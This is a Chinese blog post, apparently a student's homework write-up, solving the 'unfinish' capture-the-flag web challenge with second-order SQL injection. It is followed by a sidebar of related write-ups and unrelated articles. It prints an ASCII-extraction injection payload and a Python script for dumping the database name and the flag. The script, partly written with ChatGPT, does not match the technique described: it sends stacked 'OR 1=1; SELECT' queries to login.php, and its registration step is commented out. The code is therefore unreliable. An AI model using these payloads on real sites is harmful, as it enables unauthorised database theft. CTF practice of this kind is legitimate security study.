渗透测试第一次作业unfinish

最新推荐文章于 2024-08-22 10:10:35 发布
最新推荐文章于 2024-08-22 10:10:35 发布
阅读量155 收藏
点赞数 1
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63706130/article/details/140939823
版权

首先在攻防世界题库找对对应题目web-unfinish,下载场景.

 扫描后台后发现register.php,进行修改后得到

进行注册:

在进行注册之后,页面跳转回login.php,很明显在注册界面跳转时出现了用户名并返回,对其进行检测 

在register.php中的insert语句注入username,在index.php中显示注入的结果

根据老师所给文档判断,后端使用用户名查询时造成sql注入利用0’+ascii(payload)+'0来获取到信息的ASCII码

构造payload:

0'+ascii(substr((select database()) from 1 for 1))+'0

根据文档python脚本进行修改,借助了ChatGPT,进行获取flag.自己对于Python脚本自主编写能力很差要多加练习,对于很多代码还是看不懂,需要借助工具来解释.

import requests  
import time  
from bs4 import BeautifulSoup  
  
def getDatabase():  
    database = ''  
    for i in range(100):  # 假设数据库名长度不超过100字符  
        data_database = {  
            'username': "' OR 1=1; SELECT ASCII(SUBSTRING(DATABASE(), %d, 1)) -- -" % (i+1),  
            'password': '1',  
            'email': '1@1' + str(i)  
        }  
        # 模拟注册过程(通常这里不会返回数据库名)  
        # requests.post("http://example.com/register.php", data_database)  
  
        # 假设登录过程返回了数据库名的某个字符的ASCII值  
        login_data = {  
            'username': "' OR 1=1; SELECT ASCII(SUBSTRING(DATABASE(), %d, 1)) -- -" % (i+1),  
            'password': '1',  
            'email': '1@1' + str(i)  
        }  
        response = requests.post("http://example.com/login.php", login_data)  
        html = response.text  
        soup = BeautifulSoup(html, 'html.parser')  
  
        # 假设登录响应的HTML中有一个<span>标签包含了ASCII值  
        getUsername = soup.find_all('span')  
        if getUsername:  
            username = getUsername[0].text  
            if username.isdigit():  
                database += chr(int(username))  
            else:  
                break  # 如果不是数字,可能是错误响应,跳出循环  
        else:  
            break  # 如果没有找到<span>标签,可能是错误响应,跳出循环  
  
    return database  
  
def getFlag():  
    flag = ''  
    for i in range(100):  # 假设flag长度不超过100字符  
        data_flag = {  
            'username': "' OR 1=1; SELECT ASCII(SUBSTRING((SELECT flag FROM flags LIMIT 1), %d, 1)) -- -" % (i+1),  
            'password': '1',  
            'email': '1@1' + str(i)  
        }  
        # 模拟注册过程(通常这里不会返回flag)  
        # requests.post("http://example.com/register.php", data_flag)  
  
        # 假设登录过程返回了flag的某个字符的ASCII值  
        login_data = {  
            'username': "' OR 1=1; SELECT ASCII(SUBSTRING((SELECT flag FROM flags LIMIT 1), %d, 1)) -- -" % (i+1),  
            'password': '1',  
            'email': '1@1' + str(i)  
        }  
        response = requests.post("http://example.com/login.php", login_data)  
        html = response.text  
        soup = BeautifulSoup(html, 'html.parser')  
  
        # 假设登录响应的HTML中有一个<span>标签包含了ASCII值  
        getUsername = soup.find_all('span')  
        if getUsername:  
            username = getUsername[0].text  
            if username.isdigit():  
                flag += chr(int(username))  
            else:  
                break  # 如果不是数字,可能是错误响应,跳出循环  
        else:  
            break  # 如果没有找到<span>标签,可能是错误响应,跳出循环  
  
    return flag  
  
print(getDatabase())  
print(getFlag())

·KABUTO·
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
6-XCTF-Web-unfinish(二次注入)
cquptcqupt的博客
08-17 297
这里写目录标题一、二级目录三级目录 一、 二级目录 三级目录
[网鼎杯 2018]unfinish.md
09-05
[网鼎杯 2018]unfinish.md
网鼎杯2018-二次注入unfinish绕过
lizhiiiii的博客
03-07 477
我们可以通过转两次十六进制来得到库名(如果只转一次十六进制如果转出的十六进制中有英文字母那么英文字母后面的数字就会被截断 我们得到的就不是完整的数字)
unfinish ctf 网鼎杯二次注入 无列名注入join-using
weixin_65785894的博客
08-06 601
成功回显管理员第一个字母w,当然后面可以多次注入,最后拼接数据库名为web,表名我们直接就猜flag了,当然你也可以通过mysql默认的sys去进行注入出来因为information被禁用了。我们不知道什么符号过滤了(绕过一些字符 一个一个试很麻烦,需要整理一些字符 (可以去 fuzz字典 查看))information被过滤掉之后,我们只能换方法,看看,其他库里还能不能拿到我们想要的数据。但是 里面并没有我们想要的结果 只有一些表的信息,没有列名的表。我们就查到了security中的表。
二次注入(sql靶场第24关+网鼎杯comment二次注入+网鼎杯-2018-Web-Unfinish
huizhaohaha的博客
08-08 1031
发现了有意思的东西,这不就代表有过滤吗,跟上一次注册语句发现多了一个逗号,很明显逗号被过滤了,但是我们现在不知道还有啥被过滤了,所以我使用burpsuite的暴力破解模块看还有什么被过滤啦,因为我用的只是针对我们需要用到的东西进行过滤,information库是为了方便我们后续注入表名、列名,sys是当information不能使用之后查表名、列名所要用到的库,这样可以花费很少的时间解出这道题。我们查看源代码看看到底是原理,那就按照刚刚的流程来看源代码,先是创建的源码,而查看后发现就是正常的创建。
XCTF:unfinish(2018网鼎杯)(SQL二次注入)
羽的博客
09-14 1099
见到这题,我就和上面的图片是一样的(很形象) 扫出个注册页面 简单fuzz,可以知道他过滤了逗号和information,没有逗号,就防止了报错注入,因为注册界面一般是insert语句。又把information这个SQL注入中重要的数据库过滤了。然后就很难。 正确思路应该是二次注入 当注册时用户名使用:1' and '0 当注册时用户名为:1' and '1 所以这里是存在二次注入的。 在mysql中,+只能当做运算符。 ...
SQL注入:网鼎杯2018-unfinish
qq_68163788的博客
02-21 1276
SQL注入是一种常见的网络安全漏洞,攻击者利用该漏洞向应用程序的数据库中插入恶意的SQL代码,从而实现对数据库的非法访问或控制。攻击者可以通过SQL注入攻击获取敏感数据、修改数据、删除数据,甚至完全控制数据库
网鼎杯-2018-unfinish解题方法
Lemon_miko的博客
04-27 555
这里我们会发现登录不进去也没有注册界面以及源码,这里我们需要获取它其他的一些界面找注入机会,这里有两种方式找其他界面,一种是猜这里是登录界面那么必定就会有注册界面一般注册界面的名字无非就是reg.php,register.php这是register.php界面当然这种就是靠运气和我们的经验了。在mysql中+只是一个运算符所以我们可以用此方式来获取数据库的ascii码值当然这里也可以使用16进制的方式但要注意的一点是如果hex值过长需要进行截断以及如过算出的hex值是字符会被截断因此需要两次16进制转化。
【愚公系列】2023年06月 攻防世界-Web(unfinish
时光隧道
06-15 4276
SQL注入是一种常见的攻击方式,它利用web应用程序漏洞,通过向Web应用程序提交恶意的SQL语句,从而获得对数据库的访问权限。SQL注入常见的攻击方式包括:基于错误的注入攻击(error-based):通过构造报错语句,把数据库中的错误信息暴露给攻击者,从而获取敏感信息。基于盲注的攻击(blind-based):攻击者无法直接从Web应用程序获得数据库中的信息,但是他们可以通过提交变异的查询,来判断查询结果是否正确,进而推断出数据库中的信息。
[网鼎杯2018]Unfinish
Sk1y的博客
02-08 394
[网鼎杯2018]Unfinish 文章目录[网鼎杯2018]Unfinish二次注入 二次注入 disearch扫一下,有login.php,还有register.php,对应登录注册功能 推测有二次注入,测试一下 注册时 12345678@qq.com 0'+ascii(substr((select * from flag)from 1 for 1))+'0; 123456 回显 fuzz的时候,发现, information被过滤了,看师傅们的wp,都是直接猜字段名为flag,然后读取flag i
Part_CAE_Unfinish.rar
06-15
作为一款强大的计算机辅助工程(Computer-Aided Engineering,CAE)软件,UG(Unigraphics NX)提供了全面的有限元求解器,使得工程师和初学者能够对产品进行精确的性能预测,从而优化设计,减少物理原型的制作和...
微信小程序 setData 对 data数据影响问题
10-17
然而,由于 `setData` 的工作方式,如果这两个变量都指向同一个数据源,那么改变其中一个会影响到另一个。这就是问题所在:当我们试图通过 `setData` 更新 `uniqueitem`,实际上 `cloneitem` 也会同步更新,因为它们...
【达梦数据库】-导入导出过程中get DDL复现过程
weixin_47686079的博客
08-20 309
在处理问题的过程中,客户反馈在达梦数据库中导入导出分区表,get 表的DDL,不会出现表的所有分区信息,ORACLE数据库却会出现所有分区表,事实真的如此吗?
Spring Boot实现简单的Oracle数据库操作
beautiful77moon的博客
08-18 453
使用到的技术:1. Spring Boot:用于简化Spring应用的开发。2. Dynamic DataSource:实现动态多数据源的访问和切换3. Oracle JDBC Driver:与Oracle数据库进行连接和交互。4. Mybatis-Plus:简化SQL映射和数据库访问。其中BaseMapper接口提供了对数据表进行基本操作的功能。5. Lombok:用于简化Java类的开发,自动生成常用的代码,比如getter、setter、构造函数等。
分布式事务:基本概念
玉汝于成
08-20 271
事务可以看做事一次大的活动,它由不同的小的活动组成,这些活动要么全部成功,要么全部失败。
linux安装达梦数据库
HAN_789的博客
08-19 222
如果无法创建dmdba 文件夹,需要进入root用户下 在管理员用户下,这种安装方式一般只用于验证,开发,测试,生产最好还是安装传统的方式安装。在 home/dmdba/dmdbms/bin 目录下执行。(1)将文件上传到 /home/dmdba/ 目录下。(2)加压:tar -xzvf dmdb.tar.gz。进入到root就可以创建dmdba 文件夹了。1、后台启动,一般建议用后台启动。
网上商品订单转手系统bootpf
weixin_43213064的博客
08-18 550
【代码】springboot网上商品订单转手系统bootpf
Android架构组件:MVVM模式的实战应用
最新发布
m0_66995023的博客
08-22 248
在 Android 开发中,MVVM(Model-View-ViewModel)模式是一种非常流行的架构模式,它可以帮助开发者更好地组织代码,使得应用程序更加模块化、易于维护。用途:在 ViewModel 中使用,当数据发生变化时通知 View 更新。职责:作为 Model 和 View 之间的桥梁,处理 UI 相关的逻辑。实例:持有数据和 UI 相关的状态,处理用户输入,更新 UI 等。用途:实现 View 和 ViewModel 之间的双向绑定。特点:简化 UI 更新逻辑,减少手动更新 UI 的代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值